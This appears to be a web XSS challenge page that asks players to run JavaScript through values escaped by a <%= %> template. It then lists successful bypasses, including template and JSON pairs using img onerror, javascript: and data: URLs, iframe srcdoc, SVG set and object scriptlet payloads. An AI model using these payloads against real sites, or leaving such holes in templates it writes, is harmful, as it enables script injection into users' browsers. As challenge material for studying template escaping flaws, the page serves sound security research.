XSS Challenge

Challenge: Are you able to run script from a value in the JSON within the template when the template is trying to escape the data?

When you click the Render-button, the untrusted data in the JSON will be applied to the trusted template, and the output will be displayed on the left. Your goal is to have JS from a JSON value run even though <%= variable %> is used to output the value containing the attack.


Email me or DM me on twitter if you find anything interesting.

Template (JS within the template is considered trusted): Data (put your exploit in a JSON value in here):


Successful bypasses

<<%= foo %>>
{ "foo" : "img onerror='alert(1)' src=" }
<form id=x><button form=x formaction="<%= y %>">CLICKME
<div style=mask:url(<%= title %>)></div>
<form action="<%= x %>"><<button>
<img src=<%= a %> /><%= b %>
  title="Buy <%=number%> at <%=price%> = $<%=cost%>/month
	AND SAVE $$$">BUY NOW</a>
<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#">
<set attributeName="xlink:href" begin="0s" to="<%= x %>" /><circle r=40>
<object data="<%= boob %>"></object>
<input type="text" value=``<"<%=x%>"><%=x%></div>
{ "x":"div/onmouseover='alert(1)" }
<object type="text/x-scriptlet" data="<%=x%>"</object>
{ "x":"jsfiddle.net/XLE63/" }
<meta http-equiv="refresh" content="0;url=<%= description %>">
{"description": "javascript:alert(document.domain)"}
<a link="<%= d %>" style="-o-link:attr(link);-o-link-source:current">click me</a>
{"description": "data:text/html,<script>alert(document.domain);</script>"}
<iframe srcdoc='&lt;svg/onload=<%=x%>&gt;'>